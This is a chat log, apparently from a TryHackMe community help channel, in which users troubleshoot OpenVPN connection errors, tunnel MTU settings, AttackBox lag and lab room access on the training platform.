The votes to reset aren't near the threshold to reset to default state, and it looks like someone set the firewall on a host I previously had working SSH access to. All ports filtered according to nmap.

This is the first machine (hostname prod-serv) in the Wreath network.

nimble cedar
#

Has anyone experieced screen tearing issues in a kali VM on VB I have hardware acceleration turned off and its still tearing my screen with dual monitors

#

why am i pushing it with two monitors redlining the vram

nimble cedar
#

nvm fixed

ivory spruce
soft nexus
#

Hi everyone, Just wanted to ask a quick question. I've connected to the VPN successfully and it shows i'm connected. But sometimes when I'm doing a room for example, (OWASP Top 10 - 2021) it shows as red for my connection but I can still do the tasks for the most part. Is this common or it'll resolve itself while being connected to the VPN?

ivory spruce
soft nexus
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #15 - 438)

nimble cedar
#

Anyone available to help troubleshoot a technical issue ?

#

Randomly my the difference between the icon of my mouse and where the mouse selects is off on the x axis by an unknown amount. I dont know how this happened but here I am explaining some weird event

nimble cedar
#

This is on my VM and idk how this happened Im blaming an overly intrusive employer that like to bigbrother their employees

naive dust
lyric basin
#

Greetings,
When do THM team support start their office hours?

weary spindle
ivory spruce
naive dust
heady belfry
#

Hello All, I have an issue in OWASP Juice Shop - Burb is set up, the VM is up, I am using an attackbox. When I choose a fake email and password - and click on Log in - nothing happens. The request should go to BURB, but it does not do that. I am using foxproxy on Attackbox FF. Am I the lucky one having this issue?

naive dust
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #15 - 439)

topaz iron
#

is there a way to scale tickets or something? in january I paid to have access to a room, that room never worked(only 2 days) and support only repond every 2 weeks or so to tell me to do the same thing over and over, things I already tried even before i was told to do it. Now my membership been over for about 2 week now and my problem never got solved. it shouldnt be taking this long to respond to such import ticket because i basecally paid for something I never used

bronze vale
topaz iron
scenic torrentBOT
#

Gave +1 Rep to @bronze vale (current: #6 - 1173)

topaz iron
# bronze vale Every two weeks? Weird, let me check on that 🙂

is about the lateral movement room I came here looking for help with, I paid for the room and basically never worked expect for 2 days. in the first week or so I didnt mind because i told myself i have a whole month, but then after days of the box being in the state of "resetting" I came here asking for help, then after that i sent them an email

glacial hound
naive dust
#

Hello, im having issues with my openvpn , it says "cipher not set" and "--allow compression" is not set to "no"
how can i fix this?

bronze vale
naive dust
bronze vale
naive dust
bronze vale
#

the latter

naive dust
# bronze vale the latter

Basically
Data channel: cipher 'AES-256-cbc' , auth 'SHA512', peer-id 93, compression:'stub'
Timers: ping 5 , ping-restart 120

#

and than nothing happens just loads forever

stiff orchid
#

do you see Initialization Sequence Completed just above that?

naive dust
#

yes

stiff orchid
#

that just means its running

bronze vale
#

Then you're connected

naive dust
#

but whenever i try to connect via ssh tryhackme@10.etc it just tries to connect forever and nothing happens

bronze vale
naive dust
#

yes

#

ill send what it outputs when i try to ssh

stiff orchid
#

if you close the terminal, you close the vpn connection

#

I tend to just minimise it and open a new terminal for doing the room stuff

naive dust
#

okey now nothing happens when i try to ssh maaaaan ,_,

naive dust
#

So im connected with my VPN and it even displays it in the Access, but when i try to SSh after i start the machine on tryhackme, it just wont connect, nothing happens.

weary spindle
#

Which machine are you tring to ssh in to?

naive dust
weary spindle
west chasmBOT
naive dust
weary spindle
#

Yeah.

naive dust
bronze vale
# naive dust

Can you try this command in a terminal sudo ip link set dev tun0 mtu 1200 while the VPN is running, and try again.

#

sudo ip link set dev tun0 mtu 1200

bronze vale
#

Pin for easy access

weary spindle
#

I was about to gid that out, I was able to SSH in.

naive dust
#

okey it seems to have worked this time, can i get an explanation as to why and what did this command do exactly?

bronze vale
#

As for why that works, no clue

zealous yoke
# naive dust okey it seems to have worked this time, can i get an explanation as to why and w...

TLDR, and I think it was Scrubz who used this analogy, but to expand on it, changing the MTU size is basically like fitting a letter through a letterbox. Some networks (letterboxes) have a certain size, so reducing the MTU means that you are reducing the size of letter to fit through the letterbox to make it fit

When a packet (letter) is "too big" on a network, it'll be fragmented (split into smaller letters), reducing the size of the packet means that it'll be sent as one, making things more stable essentially

zealous yoke
#

'tis a great one

weary spindle
#

I think it's one of the easiest for new people to understand.

bronze vale
#

I assumed so but didn't want to guess hah

compact dagger
#

any help? on the ad enumeration network. it is also not working on the attack box

bronze vale
#

Or you can DM me your config and I'll do it^ 🙂

compact dagger
#

Worked, Thanks!

scenic torrentBOT
#

Gave +1 Rep to @zealous yoke (current: #8 - 812)

graceful copper
#

Trying to connect to THM network via openvpn to access virtual machines from my kali box but get this error message: 2024-02-26 14:35:33 OpenSSL: error:0A000086:SSL routines::certificate verify failed:
2024-02-26 14:35:33 TLS_ERROR: BIO read tls_read_plaintext error
2024-02-26 14:35:33 TLS Error: TLS object -> incoming plaintext read error
2024-02-26 14:35:33 TLS Error: TLS handshake failed
2024-02-26 14:35:33 SIGUSR1[soft,tls-error] received, process restarting
2024-02-26 14:35:33 Restart pause, 32 second(s)
2024-02-26 14:36:05 TCP/UDP: Preserving recently used remote address: [AF_INET]18.202.168.160:1194
2024-02-26 14:36:05 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-26 14:36:05 UDPv4 link local: (not bound)
2024-02-26 14:36:05 UDPv4 link remote: [AF_INET]18.202.168.160:1194
2024-02-26 14:36:05 TLS: Initial packet from [AF_INET]18.202.168.160:1194, sid=c87d3290 bf8cc344
2024-02-26 14:36:05 VERIFY ERROR: depth=1, error=self-signed certificate in certificate chain: CN=ChangeMe, serial=4253972025568076415436600482379463047720978

wind wedge
marble breachBOT
#

Done!

opal forum
#

is there any problem with openvpn right now?

#

i tried redownloading files again and again still not working

#

how do i solve it now😪

weary spindle
#

4 lines from the bottom.

opal forum
#

previously there was one but now there are 4 of these tun any way to remove them

opal forum
weary spindle
#

Because you have multiple tunnels open.

#

sudo killall openvpn -9

Then re-connect once.

opal forum
#

thanks it worked..I had tried with killall openvpn but didnt work then…will use kilall openvpn -9 frm next time..thanks sir

weary spindle
#

-9 just tells it to end without saving etc.

Just end.

graceful copper
#

still no luck

wind wedge
#

What server are you on?

graceful copper
#

well I use EU

wind wedge
#

Which EU? Theres a few different ones

graceful copper
#

I have tried 1 and 3

graceful copper
wind wedge
#

Try 2 and then regenerate and then download and try to run again after that

weary spindle
graceful copper
#

UK

weary spindle
#

Is your VM synched zto the same time and date?

graceful copper
weary spindle
graceful copper
#

I can try downloading EU 1 , 2, 3 again and see if it works

#

Working now

devout knot
#

tried from attackbox and vpn.

weary spindle
north umbra
#

Hey I have a problem with a pc I’ve just built. So I click the button to turn the pc on, ram, case fans and gpu starts flashing its rgb lights. CPU cooler and case fans are working but nothing is happening. I mean for the 20-30 seconds monitors don’t show anything and it looks like pc is waiting for gpu fans to start working. Until gpu fans don’t start working then pc will not turn on fully. Anyone knows why is that?

weary spindle
north umbra
#

Alr

crimson bluff
wise grotto
#

can anything be done about a network that’s in a bad state? or am I basically screwed? I’ve voted to reset the Wreath network 3 times in as many days and still am unable to connect to the publically facing host (seems like last octet for this one is always .200). Seems like either the network is bugged or someone keeps rooting that machine then closing down the firewall.

halcyon tinsel
bold isle
#

Hej! I have the chance to get a sponsoring for a really high amount of vouchers, but I need to provide an invoice. I just bought a 1-month voucher to test that. There is no invoice, unfortunately. There is only an email saying: "Thank you for purchasing vouchers on TryHackMe. You paid $14 for 1 subscription vouchers that (once redeemed) will keep the user subscribed for 1 months. You can keep an eye on which users have redeemed them below:". Is there any possibility to get an invoice?

weary spindle
west chasmBOT
#
TryHackMe's Email

TryHackMe's support email address.

bold isle
scenic torrentBOT
#

Gave +1 Rep to @west chasm (current: #246 - 20)

karmic salmon
#

I am playing the Bandit challenge I compromised the Linux machine and I need Lateral Movement to the Windows machine may by misstic i removed the vuln file in or any other hacker was removed from local/share/powershell/PSReadLine/
so anyone face the missing file for PSSession

hybrid salmon
#

Hello, there's a bug in the Malware Analysis "Dissecting PE headers" room at the last question of Task 4, it asks for the Timestamp of the PE file so I copy and paste it but it doesn't account it as a right answer.

#

Soo i don't know, what am I supposed to do?

gritty fjord
#

Hi mates,
can someone help me. I'm not able to connect using openvpn. I'm not able to understand the problem.
It says : TLS Error: TLS key negotiation failed to occur with in 60 seconds
TLS Error : TLS handshake failed

wind wedge
#

What server are you on?

gritty fjord
wind wedge
#

Have you tried regenerating your config and then redownload?

gritty fjord
#

Yes @wind wedge

#

But no luck

wind wedge
#

Make sure your time is correct

gritty fjord
#

Which time?

wind wedge
#

Time on your PC/VM, if it's not correct make sure to change it to correct time

gritty fjord
#

It's correct

wind wedge
#

What servers have you tried?

gritty fjord
#

I'm in India currently and tried all the servers to connect but same error is showing

#

2024-02-27 07:46:22 TCP/UDP: Preserving recently used remote address: [AF_INET]54.193.240.194:1194
2024-02-27 07:46:22 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-27 07:46:22 UDPv4 link local: (not bound)
2024-02-27 07:46:22 UDPv4 link remote: [AF_INET]54.193.240.194:1194
2024-02-27 07:47:22 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)
2024-02-27 07:47:22 TLS Error: TLS handshake failed
2024-02-27 07:47:22 SIGUSR1[soft,tls-error] received, process restarting
2024-02-27 07:47:22 Restart pause, 1 second(s)
2024-02-27 07:47:23 TCP/UDP: Preserving recently used remote address: [AF_INET]54.193.240.194:1194
2024-02-27 07:47:23 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-27 07:47:23 UDPv4 link local: (not bound)
2024-02-27 07:47:23 UDPv4 link remote: [AF_INET]54.193.240.194:1194

this is the error

hybrid salmon
#

Do you have any firewall set up and running?

#

I think it is coming from your router/firewall

gritty fjord
#

yes im in my office network

weary spindle
naive dust
hybrid salmon
#

you have to allo the port from your firewall/router

gritty fjord
weary spindle
#

Or your Orgs?

#

No, you can't change the protocol.

scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #2 - 2014)

gritty fjord
naive dust
#

You used sudo right? xd

hybrid salmon
#

It is port 1194 for openVPN and 443 for TLS make sure both ports are allowed

weary spindle
gritty fjord
weary spindle
#

Then we cannot help you.

#

If the Org is blocking your access, we can't change that.

#

Or aid with it.

We can only do it on your own network, if it's your home network it's usually something trivial,

near sequoia
#

Scrubz just hack the network and help him. /s

weary spindle
#

The only advice I can give about using TryHackMe in work, is to use the attackbox, unless that is blocked too.

naive dust
#

Or just do your work 😉 /j

gritty fjord
scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #2 - 2015)

gritty fjord
naive dust
#

No problem, good luck 😄

gritty fjord
#

i will try to unblock that port on my organisation network cause i also managing the firewall skidy

naive dust
#

Be careful and research the impact first ;D

gritty fjord
smoky hazel
#

how to solve this can anyone pls help WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.

bronze vale
#

that's a warning, it doesn't affect your connection

real tapir
#
Tue Feb 27 14:49:48 2024 Note: cipher 'AES-256-CBC' in --data-ciphers is not supported by ovpn-dco, disabling data channel offload.
Tue Feb 27 14:49:48 2024 OpenVPN 2.6.9 [git:v2.6.9/6640a10bf6d84eee] Windows [SSL (OpenSSL)] [LZO] [LZ4] [PKCS11] [AEAD] [DCO] built on Feb 12 2024
Tue Feb 27 14:49:48 2024 Windows version 10.0 (Windows 10 or greater), amd64 executable
Tue Feb 27 14:49:48 2024 library versions: OpenSSL 3.2.0 23 Nov 2023, LZO 2.10
Tue Feb 27 14:49:48 2024 DCO version: 1.0.0
Tue Feb 27 14:49:48 2024 MANAGEMENT: TCP Socket listening on [AF_INET]127.0.0.1:25345
Tue Feb 27 14:49:48 2024 Need hold release from management interface, waiting...
Tue Feb 27 14:49:48 2024 MANAGEMENT: Client connected from [AF_INET]127.0.0.1:52527
Tue Feb 27 14:49:48 2024 MANAGEMENT: CMD 'state on'
Tue Feb 27 14:49:48 2024 MANAGEMENT: CMD 'log on all'
Tue Feb 27 14:49:48 2024 MANAGEMENT: CMD 'echo on all'
Tue Feb 27 14:49:48 2024 MANAGEMENT: CMD 'bytecount 5'
Tue Feb 27 14:49:48 2024 MANAGEMENT: CMD 'state'
Tue Feb 27 14:49:48 2024 MANAGEMENT: CMD 'hold off'
Tue Feb 27 14:49:48 2024 MANAGEMENT: CMD 'hold release'
Tue Feb 27 14:49:48 2024 TCP/UDP: Preserving recently used remote address: [AF_INET]18.202.168.160:1194
Tue Feb 27 14:49:48 2024 Socket Buffers: R=[65536->65536] S=[65536->65536]
Tue Feb 27 14:49:48 2024 UDPv4 link local: (not bound)
Tue Feb 27 14:49:48 2024 UDPv4 link remote: [AF_INET]18.202.168.160:1194
Tue Feb 27 14:49:48 2024 MANAGEMENT: >STATE:1709041788,WAIT,,,,,,```

Just keeps on trying to listen. No Data is coming in
bronze vale
#

Are you using -v

smoky hazel
bronze vale
real tapir
#

I normally just do sudo openvpn configfile and that worked for the past week.

#

after that curl 10.10.10.10/whoami

#

(In a different session on the same pc)

bronze vale
#

Your VPN is still connecting, have you tried connecting at school before?

real tapir
#

yes, didn't do anything.

bronze vale
#

Do you have permission from your school to use TryHackMe?

smoky hazel
languid pier
real tapir
bronze vale
#

Just because everyone does what they want doesn't imply you have permission to do it

#

It's not your network, you need to ask if you can do it.

real tapir
#

We were given no restrictions on what we can do in the network. As long as it's not illegal and not bypassing the firewall, we can act on our own

#

That is what we were told

languid pier
bronze vale
real tapir
languid pier
bronze vale
#

AceS, I have got this^

real tapir
languid pier
#

Ight

bronze vale
#

@real tapir I need a screenshot of your whole terminal

west chasmBOT
real tapir
#

alright, one second

naive dust
#

Funny thing is, the network protection at my work blocks the THM website by default too (im the administrator so no problem)

languid pier
naive dust
#

True

#

But it is because hack is in the name

real tapir
#

Cant really post an image in here

languid pier
#

Ikr

naive dust
#

@real tapir

weary spindle
real tapir
#

Alright

smoky hazel
# languid pier Can you show your whole error too

2024-02-27 08:53:57 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2024-02-27 08:53:57 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2024-02-27 08:53:57 Note: '--allow-compression' is not set to 'no', disabling data channel offload.
2024-02-27 08:53:57 OpenVPN 2.6.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2024-02-27 08:53:57 library versions: OpenSSL 3.1.4 24 Oct 2023, LZO 2.10
2024-02-27 08:53:57 DCO version: N/A
2024-02-27 08:53:57 TCP/UDP: Preserving recently used remote address: [AF_INET]18.202.129.195:1194
2024-02-27 08:53:57 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-27 08:53:57 UDPv4 link local: (not bound)
2024-02-27 08:53:57 UDPv4 link remote: [AF_INET]18.202.129.195:1194
2024-02-27 08:53:57 TLS: Initial packet from [AF_INET]18.202.129.195:1194, sid=654988a8 8ef189ba
2024-02-27 08:53:58 VERIFY OK: depth=1, CN=ChangeMe
2024-02-27 08:53:58 VERIFY KU OK
2024-02-27 08:53:58 Validating certificate extended key usage
2024-02-27 08:53:58 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2024-02-27 08:53:58 VERIFY EKU OK
2024-02-27 08:53:58 VERIFY OK: depth=0, CN=server
2024-02-27 08:53:58 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 2048 bits RSA, signature: RSA-SHA256, peer temporary key: 253 bits X25519

bronze vale
#

There isn't an error

smoky hazel
# smoky hazel 2024-02-27 08:53:57 WARNING: Compression for receiving enabled. Compression has ...

2024-02-27 08:53:58 [server] Peer Connection Initiated with [AF_INET]18.202.129.195:1194
2024-02-27 08:53:58 TLS: move_session: dest=TM_ACTIVE src=TM_INITIAL reinit_src=1
2024-02-27 08:53:58 TLS: tls_multi_process: initial untrusted session promoted to trusted
2024-02-27 08:53:59 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
2024-02-27 08:54:00 PUSH: Received control message: 'PUSH_REPLY,route 10.10.0.0 255.255.0.0,route-metric 1000,comp-lzo no,route-gateway 10.8.0.1,topology subnet,ping 5,ping-restart 120,ifconfig 10.8.76.209 255.255.0.0,peer-id 9'
2024-02-27 08:54:00 OPTIONS IMPORT: --ifconfig/up options modified
2024-02-27 08:54:00 OPTIONS IMPORT: route options modified
2024-02-27 08:54:00 OPTIONS IMPORT: route-related options modified
2024-02-27 08:54:00 Using peer cipher 'AES-256-CBC'
2024-02-27 08:54:00 net_route_v4_best_gw query: dst 0.0.0.0
2024-02-27 08:54:00 net_route_v4_best_gw result: via 192.168.0.1 dev eth0
2024-02-27 08:54:00 ROUTE_GATEWAY 192.168.0.1/255.255.255.0 IFACE=eth0 HWADDR=00:0c:29:8c:7f:c9
2024-02-27 08:54:00 TUN/TAP device tun0 opened
2024-02-27 08:54:00 net_iface_mtu_set: mtu 1500 for tun0
2024-02-27 08:54:00 net_iface_up: set tun0 up
2024-02-27 08:54:00 net_addr_v4_add: 10.8.76.209/16 dev tun0
2024-02-27 08:54:00 net_route_v4_add: 10.10.0.0/16 via 10.8.0.1 dev [NULL] table 0 metric 1000
2024-02-27 08:54:00 Initialization Sequence Completed
2024-02-27 08:54:00 Data Channel: cipher 'AES-256-CBC', auth 'SHA512', peer-id: 9, compression: 'stub'
2024-02-27 08:54:00 Timers: ping 5, ping-restart 120

bronze vale
#

Your VPN is fine

languid pier
#

I think he might be confused

bronze vale
real tapir
#

alright verified now

smoky hazel
#

wt abt this Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.

real tapir
languid pier
bronze vale
real tapir
#

Wait, had another session running that i didn't notice

#

one sec

smoky hazel
#

fine thnx y'all

real tapir
#

Still the same thing.

real tapir
bronze vale
#

Something is blocking your connection

real tapir
#

That is weird...

#

That gives me a small idea about what the issue might be

bronze vale
#

Do you have mobile data?

real tapir
#

No

#

yes

#

acutally

#

but not connected right now

bronze vale
#

Tether to your mobile data and try connecting again

real tapir
#

alright

bronze vale
#

This isn't a foolproof way but if it does connect, your school is blocking the VPN.
If it doesn't connect, the connection may be blocked by your phone's service provider.

real tapir
#

The school is blocking protonvpn

#

Damn

#

Well, I'll try connecting to my account on a different pc. If that worked I'd know that my pc is the problem. I don't think the network is the problem since it used to work

naive dust
#

Maybe they changed something huh?

real tapir
#

Maybe. I'll look into this more. I don't think they'd change the network settings just cuz I was connecting to a vpn but everything is possible these days

bronze vale
#

You can try asking?

naive dust
real tapir
bronze vale
real tapir
bronze vale
#

Windows?

real tapir
#

Yes

bronze vale
#

what are you connecting with?

real tapir
#

openvpn gui

bronze vale
#

OpenVPN connect or the other one?

real tapir
#

The one with the smaller file size

bronze vale
#

Can you send the link?

real tapir
#

Windows 64-bit MSI installer

bronze vale
#

yeah that's fine

#

np

real tapir
#

I tried doing it with the one with the big file size but that one also didn't work

#

Last time openvpn didn't work at all I changed servers. Then everything worked

#

This time there is no way out.

#

I am slowly losing all my nerves with this but I guess that's just part of the job.

whole basalt
#

I am trying to do one room in which attackbox is mandatory, but the problem it is running too slow that I am not able to run a single command. Can anyone suggest how i decrease the lagging of attackbox?

whole basalt
#

In that room two machine is required for the victim I have already done RDP, the attacker machine should be on attackbox. It didn't provide me option to do attack using own machine.

whole basalt
#

Caldera

shrewd cedar
whole basalt
#

Same thing is happening with me, it took me 10 second to write a single word in cmdline

#

Even moving cursor from one end to other is taking time

shrewd cedar
#

it was working fine before. I started facing this issue 2-3 days ago

naive dust
#

Lemmie boot the attackbox

naive dust
#

Im curious if i have the same issue

#

nothing strange

tender jasper
#

hello guys can you someone tell me , I am not able to open the room Vulnversity under complete beginner I dont have any VPN installed

tender jasper
#

I mean I have the VPN for Try hack me I dont have any other VPN installed I am able to use other rooms and completed them

#

only this room

naive dust
#

With the tryhackme VPN?

#

Then you can do other rooms yeah

tender jasper
#

Yes

#

I am able to connect to Tryhack me VPN and do other rooms , only this room having issues

#

this is on my Linux , But when I open the same on my other machine like Windows it works but the task that is deploying a machine , That IP i am not able to access

naive dust
#

Mhh i dont know

#

Maybe someone else has some wise words

jolly geyser
#

Hi guys, these are compared to what/whom?
In the top 9%
83014
Rank

naive dust
#

To other THM users 😄

jolly geyser
naive dust
#

uh yes

#

but there are many users who did one task or something

#

or only made an account

#

so compared to all accounts, not only active users

jolly geyser
#

And is there a way to see from the active users? 😄

naive dust
#

Im scared not

jolly geyser
#

ok, I will still remain proud of myself thou 😄

#

Also, when is this resetting?
48 hours
Studied this week

naive dust
#

i dont know

tender jasper
#

may be they should change the pattern to be in top 10 amoung active actual users

tender jasper
#

ahah

tender jasper
#

oh sorry

naive dust
#

no i meant, you can submit an idea

tender jasper
#

ahh

#

yea , Okok

naive dust
#

not to reprimand you 😄

tender jasper
jolly geyser
scenic torrentBOT
#

Gave +1 Rep to @stiff barn (current: #436 - 10)

naive dust
#

:))

rich tapir
#

i still dont understand this rep +/- thing . whats it for

#

gm

weary spindle
#

It gives the mods an idea of who's being helpful, otherwise, nothing.

rich tapir
#

ah i c , thank you

twilit prairie
#

Hello

#

I am a student in school

#

They have discounts for students right

west chasmBOT
weary spindle
twilit prairie
#

I am in .ae schools

#

That mean it will not accept

twilit prairie
weary spindle
ornate linden
#

.edu accepts

#

however it ends

neon loom
#

Hello All!
Is this the correct room for help with my openVPN?

ivory spruce
ivory spruce
shell bane
#

Hi, I am trying to do the Breaching Active Directory room on my kali vm, but when I go to download the file for openvpn, it doesnt work. Im downloading the breachad.ovpn file under networks, and when I click download, it gives me a 0 kb file with nothing in it. Since I couldn't figure out the issue, I tried using the attack box instead but when I do the systemd-resolve command, it says "Unknown interface breachad: No such device". I looked at the interfaces and found that there was not "breachad" interface. Can anyone help me fix one of these issues?

loud estuary
#

Hello I am trying to do the Attaktive Directory module and on task four I am not understanding how to launch Kerbute to begin the brute force.

loud estuary
#

Well if I could get some aid on this it would be appreciated its due as a homework assignment.

weary spindle
muted hound
#

i cant connect to openvpn

#

few hours ago i was still able to connect

ivory spruce
#

What VPN server is this? Have you tried other VPN servers?

muted hound
#

IN server

ivory spruce
#

Have you tried to reconnect? Or maybe restart your router - as it seems it is a problem from your end - "Network is unreachable"?

muted hound
#

EU-3 also cant

#

i tried mobile hotspot as well

ivory spruce
# muted hound EU-3 also cant

EU-Reg-3 has some issues at the moment. Maybe look at 1 or 2? And if you are a subscriber, you can check the VIP servers as well.

muted hound
#

I see thanks

#

IN-reg-1 also has issue

#

I believe all also having the same issue now

bronze vale
#

Check that UDP OpenVPN connections are allowed by your ISP

#

Try connecting on a different device

loud estuary
muted hound
weary spindle
loud estuary
weary spindle
muted hound
#

2024-02-28 04:57:42 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2024-02-28 04:57:42 Note: '--allow-compression' is not set to 'no', disabling data channel offload.
2024-02-28 04:57:42 OpenVPN 2.6.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2024-02-28 04:57:42 library versions: OpenSSL 3.0.11 19 Sep 2023, LZO 2.10
2024-02-28 04:57:42 DCO version: N/A
2024-02-28 04:57:42 TCP/UDP: Preserving recently used remote address: [AF_INET]3.7.33.194:1194
2024-02-28 04:57:42 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-28 04:57:42 UDPv4 link local: (not bound)
2024-02-28 04:57:42 UDPv4 link remote: [AF_INET]3.7.33.194:1194
2024-02-28 04:57:42 write UDPv4 []: Network is unreachable (fd=3,code=101)
2024-02-28 04:57:42 Network unreachable, restarting
this is the error message

loud estuary
muted hound
#

bro theres so many writeups.....

loud estuary
muted hound
#

my network is gone

ornate badge
#

Hi, I need some assistance for the OpenVPN Connection, I always get this error and I could not find a solution.

2024-02-28 12:51:03 OpenSSL: error:0A000086:SSL routines::certificate verify failed:

#

2024-02-28 12:51:03 TLS_ERROR: BIO read tls_read_plaintext error
2024-02-28 12:51:03 TLS Error: TLS object -> incoming plaintext read error
2024-02-28 12:51:03 TLS Error: TLS handshake failed 2024-02-28 12:51:03 SIGUSR1[soft,tls-error] received, process restarting
2024-02-28 12:51:03 Restart pause, 1 second(s) 2024-02-28 12:51:04 TCP/UDP: Preserving recently used remote address: [AF_INET]18.202.168.160:1194 2024-02-28 12:51:04 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-28 12:51:04 UDPv4 link local: (not bound)
2024-02-28 12:51:04 UDPv4 link remote: [AF_INET]18.202.168.160:1194
2024-02-28 12:51:04 TLS: Initial packet from [AF_INET]18.202.168.160:1194, sid=661f8b74 6251373f 2024-02-28 12:51:04 VERIFY ERROR: depth=1, error=self-signed certificate in certificate chain: CN=ChangeMe, serial=425397202556807641543660048237946304772097879576

loud estuary
weary spindle
molten knoll
#

Hello everyone, I am trying to join "wreath" room on thm. I clicked on "Join this room" and it leads me to "https://tryhackme.com/r/rooms" automatically. But I cannot find "Wreath" on the list... I have tried multiple times but it is always the same. I am relatively new to THM. Please help me fix this issue. 😿

wind wedge
molten knoll
#

Oh, I see. Thanks for the help!!

ornate badge
#

Can anyone connect wit OpenVPN or does someone have the same issuel like me?

#

I tried diffrent servers, downloaded and regenereted the profile multiple times, used a diffrent ThryHackMe Account. I also tried on Kali Linux, MacOS, Windows and iOS and I always get the same error like described obove.

bronze vale
#

Send a screenshot of your OpenVPN output

west chasmBOT
bronze vale
ornate badge
#

I tried my home network, mobile hotspot and now at my workplace

#

so maybe the openvpn server form THM side has an issue with the ca

stiff orchid
#

are you running the command with sudo?

ornate badge
#

yes I do

#

I also tried on Windows and the issue is the same

#

so it is not related to the OS

ivory spruce
ornate badge
ivory spruce
#

Have you been able to connect to THM OpenVPN servers previously? Also, in which country are you connecting from?

ornate badge
#

The funny thing is, that I have a second THM account which is facing the same issue

#

What happens if you regenerate your VPN profile? Are you still able to connect?

ivory spruce
#

EU-Reg-1 and EU-Reg-2 didn't work as well?

ornate badge
#

Yep

#

I think there is an issue in the certificate signing process

ivory spruce
ornate badge
halcyon condor
#

Is it possible to extend the AttackBox time without the need of buying premium?

halcyon condor
#

rip

ornate badge
#

that's why I need to get OpenVPN working

loud estuary
ornate badge
#

It seems to be fixed now. I contacted the support and now it works. It's a mistery

ornate linden
naive dust
ivory spruce
bright ridge
#

ive done everything everyone has said to do... I still cant get openvpn connect or cli to connect anymore.

bright ridge
#

mac os

weary spindle
#

Are you using brew?

bright ridge
#

yes

eager snow
#

Hi. Hi. I want help from you DNS.What is DNS?

#

I searched on the Internet, but I still couldn't find what I wanted

weary spindle
naive dust
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #15 - 441)

weary spindle
bright ridge
#

east coast us. home network. everything worked fine for the past year, nothing works since the new openvpn update

naive dust
bright ridge
#

OpenVPN 2.6.9 aarch64-apple-darwin23.2.0 [SSL (OpenSSL)] [LZO] [LZ4] [PKCS11] [MH/RECVDA] [AEAD]

#

openvpn ~/Downloads/huarkk.ovpn

#

then i get this...

#

Options error: You must define TUN/TAP device (--dev)

naive dust
#

try with sudo:

sudo openvpn ~/Downloads/huarkk.ovpn

#

that should work

bright ridge
#

still get the 'Options error: You must define TUN/TAP device (--dev)
Use --help for more information.'

#

if i do...

#

'sudo openvpn --dev tun ~/Downloads/huarkk.ovpn'

#

then i get this...

#

Options error: Unrecognized option or missing or extra parameter(s) in [CMD-LINE]:1: dev (2.6.9)
Use --help for more information.

#

ive tried delete and re install. still same thing

#

ive turned it off... and back on again...

naive dust
#

can you try with tun0 as well?

#

also: did you try to regenerate and download the certificate?

bright ridge
#
Options error: Unrecognized option or missing or extra parameter(s) in [CMD-LINE]:1: dev (2.6.9)
Use --help for more information.```
#

yep . tried new cert too. same answer

ornate badge
scenic torrentBOT
#

Gave +1 Rep to @ornate badge (current: #2011 - 1)

bright ridge
#

the openvpn connect app/gui doesnt work either.

#

which is why is started to try to use the cli

ornate badge
bright ridge
#

ill check back in about 10

naive dust
ornate badge
bright ridge
scenic torrentBOT
#

Gave +1 Rep to @ornate badge (current: #1328 - 2)

ornate badge
bright ridge
ornate badge
bright ridge
#

ps . what command doi use to disconnect openvpn?

stiff orchid
#

Ctrl+C

bright ridge
#

thank you 🙂

abstract ruin
#

can any one help me

#

to get started in the world of hacking

wind wedge
abstract ruin
#

ok for sure

#

i have read that now

#

but chere do i start

#

where

bronze vale
abstract ruin
#

thanks guys

bright ridge
#

ok. i have a new question. im in the breaching ad room, i have connected to the breaching vpn, it says i am connected, on task three, connect to http://ntlmauth.za.tryhackme.com/ - but i cannot connect. maybe my firewall?

#

"Hmm. We’re having trouble finding that site."

#

when i ping the DC . it works. packets tranmitted and recieved.

#
;; connection timed out; no servers could be reached
#

"If the ping command worked but this does not, time to contact support since there is something wrong. It is also suggested to hit the network reset button."

bright ridge
#

ok ... i got it working.... always read the drections

#

its always dns ... right?

ornate badge
#

Hahah mostly dns😂

neon loom
#

I've been having a different issue with openvpn through my VM. I get connected, but then cant work through the "Network Services - Telnet" section. I've done this section successfully many times through the Attack Box. But when i try through my connected openvpn VM, the nmap wont give me the backdoor information.

craggy canopy
#

